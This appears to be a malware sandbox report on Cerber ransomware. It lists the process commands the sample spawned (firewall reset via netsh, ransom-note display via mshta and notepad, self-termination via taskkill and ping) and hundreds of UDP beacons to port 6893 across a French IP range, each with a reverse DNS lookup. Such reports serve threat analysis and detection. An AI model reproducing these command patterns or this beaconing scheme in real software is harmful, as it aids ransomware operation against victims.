PID 2152 wrote to memory of 3852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2152 wrote to memory of 3852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\cerber.exe

"C:\Users\Admin\AppData\Local\Temp\cerber.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___YQEYK_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___UX8T_.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im "cerber.exe"

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
FR 178.33.158.0:6893 udp
FR 178.33.158.1:6893 udp
FR 178.33.158.2:6893 udp
FR 178.33.158.3:6893 udp
FR 178.33.158.4:6893 udp
FR 178.33.158.5:6893 udp
FR 178.33.158.6:6893 udp
FR 178.33.158.7:6893 udp
FR 178.33.158.8:6893 udp
FR 178.33.158.9:6893 udp
FR 178.33.158.10:6893 udp
FR 178.33.158.11:6893 udp
FR 178.33.158.12:6893 udp
FR 178.33.158.13:6893 udp
FR 178.33.158.14:6893 udp
FR 178.33.158.15:6893 udp
FR 178.33.158.16:6893 udp
FR 178.33.158.17:6893 udp
FR 178.33.158.18:6893 udp
FR 178.33.158.19:6893 udp
FR 178.33.158.20:6893 udp
FR 178.33.158.21:6893 udp
FR 178.33.158.22:6893 udp
FR 178.33.158.23:6893 udp
FR 178.33.158.24:6893 udp
FR 178.33.158.25:6893 udp
FR 178.33.158.26:6893 udp
FR 178.33.158.27:6893 udp
FR 178.33.158.28:6893 udp
FR 178.33.158.29:6893 udp
FR 178.33.158.30:6893 udp
FR 178.33.158.31:6893 udp
FR 178.33.159.0:6893 udp
FR 178.33.159.1:6893 udp
FR 178.33.159.2:6893 udp
FR 178.33.159.3:6893 udp
FR 178.33.159.4:6893 udp
FR 178.33.159.5:6893 udp
FR 178.33.159.6:6893 udp
FR 178.33.159.7:6893 udp
FR 178.33.159.8:6893 udp
FR 178.33.159.9:6893 udp
FR 178.33.159.10:6893 udp
FR 178.33.159.11:6893 udp
FR 178.33.159.12:6893 udp
FR 178.33.159.13:6893 udp
FR 178.33.159.14:6893 udp
FR 178.33.159.15:6893 udp
FR 178.33.159.16:6893 udp
FR 178.33.159.17:6893 udp
FR 178.33.159.18:6893 udp
FR 178.33.159.19:6893 udp
FR 178.33.159.20:6893 udp
FR 178.33.159.21:6893 udp
FR 178.33.159.22:6893 udp
FR 178.33.159.23:6893 udp
FR 178.33.159.24:6893 udp
FR 178.33.159.25:6893 udp
FR 178.33.159.26:6893 udp
FR 178.33.159.27:6893 udp
FR 178.33.159.28:6893 udp
FR 178.33.159.29:6893 udp
FR 178.33.159.30:6893 udp
FR 178.33.159.31:6893 udp
FR 178.33.160.0:6893 udp
FR 178.33.160.1:6893 udp
FR 178.33.160.2:6893 udp
FR 178.33.160.3:6893 udp
FR 178.33.160.4:6893 udp
FR 178.33.160.5:6893 udp
FR 178.33.160.6:6893 udp
FR 178.33.160.7:6893 udp
FR 178.33.160.8:6893 udp
FR 178.33.160.9:6893 udp
FR 178.33.160.10:6893 udp
FR 178.33.160.11:6893 udp
FR 178.33.160.12:6893 udp
FR 178.33.160.13:6893 udp
FR 178.33.160.14:6893 udp
FR 178.33.160.15:6893 udp
FR 178.33.160.16:6893 udp
FR 178.33.160.17:6893 udp
FR 178.33.160.18:6893 udp
FR 178.33.160.19:6893 udp
FR 178.33.160.20:6893 udp
FR 178.33.160.21:6893 udp
FR 178.33.160.22:6893 udp
FR 178.33.160.23:6893 udp
FR 178.33.160.24:6893 udp
FR 178.33.160.25:6893 udp
FR 178.33.160.26:6893 udp
FR 178.33.160.27:6893 udp
FR 178.33.160.28:6893 udp
FR 178.33.160.29:6893 udp
FR 178.33.160.30:6893 udp
FR 178.33.160.31:6893 udp
FR 178.33.160.32:6893 udp
FR 178.33.160.33:6893 udp
FR 178.33.160.34:6893 udp
FR 178.33.160.35:6893 udp
FR 178.33.160.36:6893 udp
FR 178.33.160.37:6893 udp
FR 178.33.160.38:6893 udp
FR 178.33.160.39:6893 udp
FR 178.33.160.40:6893 udp
FR 178.33.160.41:6893 udp
FR 178.33.160.42:6893 udp
FR 178.33.160.43:6893 udp
FR 178.33.160.44:6893 udp
FR 178.33.160.45:6893 udp
FR 178.33.160.46:6893 udp
FR 178.33.160.47:6893 udp
FR 178.33.160.48:6893 udp
FR 178.33.160.49:6893 udp
FR 178.33.160.50:6893 udp
FR 178.33.160.51:6893 udp
FR 178.33.160.52:6893 udp
FR 178.33.160.53:6893 udp
FR 178.33.160.54:6893 udp
FR 178.33.160.55:6893 udp
FR 178.33.160.56:6893 udp
FR 178.33.160.57:6893 udp
FR 178.33.160.58:6893 udp
FR 178.33.160.59:6893 udp
FR 178.33.160.60:6893 udp
FR 178.33.160.61:6893 udp
FR 178.33.160.62:6893 udp
FR 178.33.160.63:6893 udp
FR 178.33.160.64:6893 udp
FR 178.33.160.65:6893 udp
FR 178.33.160.66:6893 udp
FR 178.33.160.67:6893 udp
FR 178.33.160.68:6893 udp
FR 178.33.160.69:6893 udp
FR 178.33.160.70:6893 udp
FR 178.33.160.71:6893 udp
FR 178.33.160.72:6893 udp
FR 178.33.160.73:6893 udp
FR 178.33.160.74:6893 udp
FR 178.33.160.75:6893 udp
FR 178.33.160.76:6893 udp
FR 178.33.160.77:6893 udp
FR 178.33.160.78:6893 udp
FR 178.33.160.79:6893 udp
FR 178.33.160.80:6893 udp
FR 178.33.160.81:6893 udp
FR 178.33.160.82:6893 udp
FR 178.33.160.83:6893 udp
FR 178.33.160.84:6893 udp
FR 178.33.160.85:6893 udp
FR 178.33.160.86:6893 udp
FR 178.33.160.87:6893 udp
FR 178.33.160.88:6893 udp
FR 178.33.160.89:6893 udp
FR 178.33.160.90:6893 udp
FR 178.33.160.91:6893 udp
FR 178.33.160.92:6893 udp
FR 178.33.160.93:6893 udp
FR 178.33.160.94:6893 udp
FR 178.33.160.95:6893 udp
FR 178.33.160.96:6893 udp
FR 178.33.160.97:6893 udp
FR 178.33.160.98:6893 udp
FR 178.33.160.99:6893 udp
FR 178.33.160.100:6893 udp
FR 178.33.160.101:6893 udp
FR 178.33.160.102:6893 udp
FR 178.33.160.103:6893 udp
FR 178.33.160.104:6893 udp
FR 178.33.160.105:6893 udp
FR 178.33.160.106:6893 udp
FR 178.33.160.107:6893 udp
FR 178.33.160.108:6893 udp
FR 178.33.160.109:6893 udp
FR 178.33.160.110:6893 udp
FR 178.33.160.111:6893 udp
FR 178.33.160.112:6893 udp
FR 178.33.160.113:6893 udp
FR 178.33.160.114:6893 udp
FR 178.33.160.115:6893 udp
FR 178.33.160.116:6893 udp
FR 178.33.160.117:6893 udp
FR 178.33.160.118:6893 udp
FR 178.33.160.119:6893 udp
FR 178.33.160.120:6893 udp
FR 178.33.160.121:6893 udp
FR 178.33.160.122:6893 udp
FR 178.33.160.123:6893 udp
FR 178.33.160.124:6893 udp
FR 178.33.160.125:6893 udp
FR 178.33.160.126:6893 udp
FR 178.33.160.127:6893 udp
FR 178.33.160.128:6893 udp
FR 178.33.160.129:6893 udp
FR 178.33.160.130:6893 udp
FR 178.33.160.131:6893 udp
FR 178.33.160.132:6893 udp
FR 178.33.160.133:6893 udp
FR 178.33.160.134:6893 udp
FR 178.33.160.135:6893 udp
FR 178.33.160.136:6893 udp
FR 178.33.160.137:6893 udp
FR 178.33.160.138:6893 udp
FR 178.33.160.139:6893 udp
FR 178.33.160.140:6893 udp
FR 178.33.160.141:6893 udp
FR 178.33.160.142:6893 udp
FR 178.33.160.143:6893 udp
FR 178.33.160.144:6893 udp
FR 178.33.160.145:6893 udp
FR 178.33.160.146:6893 udp
FR 178.33.160.147:6893 udp
FR 178.33.160.148:6893 udp
FR 178.33.160.149:6893 udp
FR 178.33.160.150:6893 udp
FR 178.33.160.151:6893 udp
FR 178.33.160.152:6893 udp
FR 178.33.160.153:6893 udp
FR 178.33.160.154:6893 udp
FR 178.33.160.155:6893 udp
FR 178.33.160.156:6893 udp
FR 178.33.160.157:6893 udp
FR 178.33.160.158:6893 udp
FR 178.33.160.159:6893 udp
FR 178.33.160.160:6893 udp
FR 178.33.160.161:6893 udp
FR 178.33.160.162:6893 udp
FR 178.33.160.163:6893 udp
FR 178.33.160.164:6893 udp
FR 178.33.160.165:6893 udp
FR 178.33.160.166:6893 udp
FR 178.33.160.167:6893 udp
FR 178.33.160.168:6893 udp
FR 178.33.160.169:6893 udp
FR 178.33.160.170:6893 udp
FR 178.33.160.171:6893 udp
FR 178.33.160.172:6893 udp
FR 178.33.160.173:6893 udp
FR 178.33.160.174:6893 udp
FR 178.33.160.175:6893 udp
FR 178.33.160.176:6893 udp
FR 178.33.160.177:6893 udp
FR 178.33.160.178:6893 udp
FR 178.33.160.179:6893 udp
FR 178.33.160.180:6893 udp
FR 178.33.160.181:6893 udp
FR 178.33.160.182:6893 udp
FR 178.33.160.183:6893 udp
FR 178.33.160.184:6893 udp
FR 178.33.160.185:6893 udp
FR 178.33.160.186:6893 udp
FR 178.33.160.187:6893 udp
FR 178.33.160.188:6893 udp
FR 178.33.160.189:6893 udp
FR 178.33.160.190:6893 udp
FR 178.33.160.191:6893 udp
FR 178.33.160.192:6893 udp
FR 178.33.160.193:6893 udp
FR 178.33.160.194:6893 udp
FR 178.33.160.195:6893 udp
FR 178.33.160.196:6893 udp
FR 178.33.160.197:6893 udp
FR 178.33.160.198:6893 udp
FR 178.33.160.199:6893 udp
FR 178.33.160.200:6893 udp
FR 178.33.160.201:6893 udp
FR 178.33.160.202:6893 udp
FR 178.33.160.203:6893 udp
FR 178.33.160.204:6893 udp
FR 178.33.160.205:6893 udp
FR 178.33.160.206:6893 udp
FR 178.33.160.207:6893 udp
FR 178.33.160.208:6893 udp
FR 178.33.160.209:6893 udp
FR 178.33.160.210:6893 udp
FR 178.33.160.211:6893 udp
FR 178.33.160.212:6893 udp
FR 178.33.160.213:6893 udp
FR 178.33.160.214:6893 udp
FR 178.33.160.215:6893 udp
FR 178.33.160.216:6893 udp
FR 178.33.160.217:6893 udp
FR 178.33.160.218:6893 udp
FR 178.33.160.219:6893 udp
FR 178.33.160.220:6893 udp
FR 178.33.160.221:6893 udp
FR 178.33.160.222:6893 udp
FR 178.33.160.223:6893 udp
FR 178.33.160.224:6893 udp
FR 178.33.160.225:6893 udp
FR 178.33.160.226:6893 udp
FR 178.33.160.227:6893 udp
FR 178.33.160.228:6893 udp
FR 178.33.160.229:6893 udp
FR 178.33.160.230:6893 udp
FR 178.33.160.231:6893 udp
FR 178.33.160.232:6893 udp
FR 178.33.160.233:6893 udp
FR 178.33.160.234:6893 udp
FR 178.33.160.235:6893 udp
FR 178.33.160.236:6893 udp
FR 178.33.160.237:6893 udp
FR 178.33.160.238:6893 udp
FR 178.33.160.239:6893 udp
FR 178.33.160.240:6893 udp
FR 178.33.160.241:6893 udp
FR 178.33.160.242:6893 udp
FR 178.33.160.243:6893 udp
FR 178.33.160.244:6893 udp
FR 178.33.160.245:6893 udp
FR 178.33.160.246:6893 udp
FR 178.33.160.247:6893 udp
FR 178.33.160.248:6893 udp
FR 178.33.160.249:6893 udp
FR 178.33.160.250:6893 udp
FR 178.33.160.251:6893 udp
FR 178.33.160.252:6893 udp
FR 178.33.160.253:6893 udp
FR 178.33.160.254:6893 udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 0.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 0.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 32.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 33.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 34.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 35.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 36.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 37.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 38.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 39.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 40.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 41.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 42.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 43.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 44.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 45.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 46.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 47.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 48.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 49.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 50.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 51.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 52.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 53.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 54.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 55.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 56.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 57.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 58.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 59.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 60.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 61.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 62.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 63.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 64.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 65.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 66.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 67.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 68.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 69.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 70.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 71.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 72.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 73.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 74.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 75.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 76.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 77.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 78.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 79.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 80.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 81.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 82.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 83.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 84.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 85.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 86.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 87.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 88.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 89.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 90.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 91.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 92.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 93.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 94.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 95.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 96.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 97.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 98.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 99.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 100.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 101.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 102.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 103.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 105.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 106.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 107.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 108.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 109.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 110.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 111.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 112.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 113.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 114.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 115.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 116.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 117.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 118.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 119.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 120.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 121.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 122.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 123.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 124.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 125.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 126.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 127.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 128.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 130.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 129.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 131.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 132.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 133.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 134.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 135.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 136.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 137.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 138.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 139.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 140.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 142.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 141.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 143.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 144.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 145.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 146.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 147.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 148.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 149.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 150.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 151.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 152.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 153.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 155.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 154.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 156.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 157.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 158.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 159.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 160.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 161.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 162.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 163.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 164.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 165.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 166.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 167.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 168.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 169.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 170.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 171.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 172.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 173.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 174.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 175.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 176.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 177.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 179.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 178.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 180.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 182.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 181.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 183.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 184.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 185.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 186.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 187.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 188.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 189.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 190.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 191.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 192.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 193.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 194.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 195.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 196.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 197.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 198.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 199.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 200.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 201.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 202.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 203.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 204.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 205.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 206.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 207.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 208.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 209.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 210.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 211.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 212.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 213.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 214.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 215.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 216.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 217.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 218.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 219.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 220.160.33.178.in-addr.arpa udp
